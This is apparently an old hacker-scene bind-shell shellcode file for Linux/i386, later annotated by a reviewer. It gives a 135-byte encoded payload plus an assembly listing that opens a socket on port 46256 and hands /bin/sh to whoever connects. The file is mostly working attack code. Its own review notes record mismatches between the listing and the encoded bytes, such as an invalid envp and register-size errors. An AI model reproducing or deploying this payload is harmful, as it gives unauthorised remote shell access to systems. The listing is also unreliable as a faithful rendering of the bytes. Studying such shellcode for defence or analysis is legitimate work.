# ANTI-prym/h4g1s portshell code by jsbach =)
# email: jsb4ch@hotmail.com
# bind a shell to port 46256 (0xb4b0 =))
# this code is much more optimized than previous portshells!
# it is only 135 bytes (ADM's portshell shellcode is 238 bytes,
# prym's is 179)
# code is obfuscated because we need to use short instructions for
# small shellcode.


# char *portshell =
# "\x55\x89\xe5\xb2\x66\x89\xd0\x31\xc9"
# "\x89\xcb\x43\x89\x5d\xf8\x43\x89\x5d\xf4\x4b\x89"
# "\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89\x45\xf4"
# "\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\xb4\xb0\x89"
# "\x4d\xf0\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10"
# "\x89\xd0\x8d\x4d\xf4\xcd\x80\x89\xd0\x43\x43\xcd"
# "\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9\xb2\x3f"
# "\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41"
# "\xcd\x80\xc7\x45\xe8\x2f\x62\x69\x6e\x66\xc7\x45"
# "\xec\x2f\x73\xc6\x45\xee\x68\x31\xc9\x88\x4d\xef"
# "\xb0\x0b\x8d\x5d\xe8\x89\x5d\xe0\x8d\x4d\xe0\x31"
# "\xd2\x89\x55\xe4\xcd\x80";


/*-----------------------------------------------------------------------
 * main -- the shellcode body, wrapped as a C-callable main() for testing
 * Target: Linux/i386, raw syscalls via int $0x80, AT&T syntax.
 *
 * Syscall sequence (socket calls go through socketcall, nr 102, with
 * %ebx = sub-call number and %ecx = pointer to a 3-entry argument array):
 *   socket(AF_INET, SOCK_STREAM, 0)
 *   bind(fd, {AF_INET, port bytes b4 b0, INADDR_ANY}, 16)
 *   listen(fd, <see note at the listen call>)
 *   accept(fd, &sockaddr, <see note at the accept call>)
 *   dup2(client, 0); dup2(client, 1); dup2(client, 2)
 *   execve("/bin/sh", argv, <see note at the execve call>)
 *
 * Stack layout relative to %ebp (overlaps are deliberate, to save bytes):
 *   -32..-29  argv[0] -> "/bin/sh"
 *   -28..-25  argv[1]   (NULL terminator of argv)
 *   -24..-17  "/bin/sh\0"  (written last; overwrites the by-then-dead
 *                           sockaddr bytes at -20..-18)
 *   -20..-5   struct sockaddr_in: sin_family @-20, sin_port @-18,
 *             sin_addr @-16, sin_zero @-12..-5 (shares bytes with
 *             args[0..1] below; presumably harmless because the AF_INET
 *             bind path does not examine sin_zero)
 *   -12..-9   args[0]  socketcall argument array
 *    -8..-5   args[1]
 *    -4..-1   args[2]
 *
 * Register roles: %edx caches the current syscall number (102, later 63)
 * so every call is a 2-byte `movl %edx,%eax`; %ecx is the zero source
 * and later the args pointer; %ebx is stepped with incl/decl through the
 * socketcall sub-call numbers (1 socket, 2 bind, 4 listen, 5 accept).
 *
 * NOTE(review): several moves use an 8/16-bit size suffix with a 32-bit
 * register name (`movb ...,%edx`, `movw %ebx,...`, `movb %ecx,...`,
 * `movb ...,%eax`).  The encoded bytes in the header use the narrow
 * registers (%dl, %bx, %cl, %al); current GNU as rejects the wide
 * spelling with a suffix/register mismatch error.  Because only the low
 * byte is written, the full-width copies that follow (`movl %edx,%eax`)
 * rely on bits 8..31 of %edx already being zero.
 * NOTE(review): the listing and the encoded bytes diverge at the end:
 * the bytes zero %edx (\x31\xd2) before the execve and store it as
 * argv[1]; this listing stores %ecx there and never clears %edx, so the
 * listing passes envp == 63.  See the comment at the last int $0x80.
 *-----------------------------------------------------------------------*/
.globl main
.type    main,@function
main:
pushl %ebp
movl %esp, %ebp /* frame pointer; all scratch data lives below %ebp */
movb $102, %edx /* %dl = 102 = socketcall. only do a move from a literal once, (5 bytes ugh) */
movl %edx, %eax /* socketcall -- full copy; assumes %edx bits 8..31 were already 0 */
xorl %ecx, %ecx /* ecx is our zero register. */
movl %ecx, %ebx
/* this looks messy but leads to much smaller code: %ebx is stepped with */
/* incl/decl instead of loaded, and its intermediate values double as the */
/* constants stored into the args array */
incl %ebx /* ebx = 1: SOCK_STREAM now, SYS_SOCKET (socketcall demultiplex) later */
movl %ebx, -8(%ebp) /* args[1] = SOCK_STREAM (1) */
incl %ebx /* ebx = 2 = AF_INET */
movl %ebx, -12(%ebp) /* args[0] = AF_INET (2) */
decl %ebx /* back to 1 = SYS_SOCKET for the socketcall :( */
movl %ecx, -4(%ebp) /* args[2] = protocol 0; stored from the zero register (anti-NULL byte) */
leal -12(%ebp), %ecx /* %ecx = &args[0] */
int $0x80 /* socket(AF_INET, SOCK_STREAM, 0); -> %eax = sockfd (or -errno) */
 /* ok now sockfd is at appropriate place for subsequent socketcalls */
xorl %ecx, %ecx /* zero register again (needed below for sin_addr) */
movl %eax, -12(%ebp) /* args[0] = sockfd; stays there for bind/listen/accept */
 /* ebx == 1 here; after the incl it is 2, which is both AF_INET and SYS_BIND */
incl %ebx
movw %ebx, -20(%ebp) /* sockaddr family = AF_INET (encoded as a %bx store) */
movw $45236, -18(%ebp) /* sockaddr port: 45236 = 0xb0b4, stored little-endian as bytes b4 b0 = htons(0xb4b0) */
movl %ecx, -16(%ebp) /* addr = INADDR_ANY */
/* put the addr of the sockaddr_in struct in eax, then put eax  */
/*  in the proper place for the socketcall *argp */
leal -20(%ebp), %eax
movl %eax, -8(%ebp) /* args[1] = &sockaddr (-8 is the second arg) */
/* put the length of sockaddr in the right place: only the low byte is */
/* written; the other three bytes are still the zero stored there above */
movb $16, -4(%ebp) /* args[2] = sizeof(struct sockaddr_in) */
/* prepare for socketcall finally :) ebx == 2 == SYS_BIND */
movl %edx, %eax /* socketcall */
leal -12(%ebp), %ecx /* %ecx = &args[0] */
int $0x80 /* bind(sockfd, &sockaddr, 16) */
/* ok time to listen(2). our sockfd is already at -12(%ebp) and %ecx still points at args */
movl %edx, %eax /* socketcall heh */
 /* two incl's are 2 bytes, 1 addl is 3 bytes. ebx: 2 -> 4 = SYS_LISTEN */
incl %ebx
incl %ebx
int $0x80 /* listen(sockfd, backlog) where backlog = args[1] = the sockaddr pointer value at -8(%ebp) reinterpreted as an int; Linux clamps the backlog, so it still succeeds */
/* ok time for accept(2): ebx 4 -> 5 = SYS_ACCEPT */
/* our old sockaddr pointer is still at -8(%ebp), reused as accept's addr argument */
 /* $16 is still at -4(%ebp), dont replace it */
 /* NOTE(review): accept(2)'s third argument is `int *addrlen`, but args[2] */
 /* holds the integer 16 (i.e. pointer 0x10). Whether the call succeeds or */
 /* fails with EFAULT depends on how the kernel version in question handles */
 /* a bad addrlen pointer -- TODO confirm on the kernel being analysed. */
/* ok now do the syscall bitch! */
movl %edx, %eax
incl %ebx
/* -12(%ebp) is already in %ecx */
int $0x80 /* accept(sockfd, &sockaddr, (int *)16) -> %eax = client fd (or -errno) */
movl %eax, %ebx /* save our new socket descriptor where it will be used*/
                /* as an arg for dup2() (%ebx = oldfd) */
#fork commented out.. no need.
#movl $2, %eax
#int $0x80
#cmpl %edx, %eax
#jnz end
/* ok, time for dup2() (so all i/o from shell/to shell will be copied to */
/* the socket): dup2(client, 0), dup2(client, 1), dup2(client, 2) */
xorl %ecx, %ecx /* %ecx = newfd, counted up 0,1,2 */
 /* so we have only one move from a literal */
movb $63, %edx /* %dl = 63 = dup2 (encoded as a %dl store); same upper-bits assumption as above */
movl %edx, %eax
int $0x80 /* dup2(client, 0) -- stdin */
movl %edx, %eax
incl %ecx /* ++ecx == 1 */
int $0x80 /* dup2(client, 1) -- stdout */
movl %edx, %eax
incl %ecx /* ecx == 2 */
int $0x80 /* dup2(client, 2) -- stderr; returns 2 on success, so %eax's upper bytes are 0 for the movb below */
 /* load the string /bin/sh onto the stack here (bytes 2f 62 69 6e = "/bin") */
movl $0x6e69622f, -24(%ebp)
movw $0x732f, -20(%ebp) /* bytes 2f 73 = "/s" */
movb $0x68, -18(%ebp) /* 'h' */
xorl %ecx, %ecx
movb %ecx, -17(%ebp) /* NUL terminator (encoded as a %cl store) */
movb $11, %eax /* %al = 11 = execve (encoded as a %al store) */
leal -24(%ebp), %ebx /* %ebx = filename = "/bin/sh" */
/* argv[0] = "/bin/sh" */
movl %ebx, -32(%ebp)
movl %ecx, -28(%ebp) /* add a null to the end of **argv */
leal -32(%ebp), %ecx /* %ecx = argv */
int $0x80 /* execve("/bin/sh", argv, %edx). NOTE(review): in this listing %edx is still 63 from the dup2 calls, so envp is not a valid pointer; the encoded bytes in the header instead execute xorl %edx,%edx before this call (and store %edx, not %ecx, at -28) */
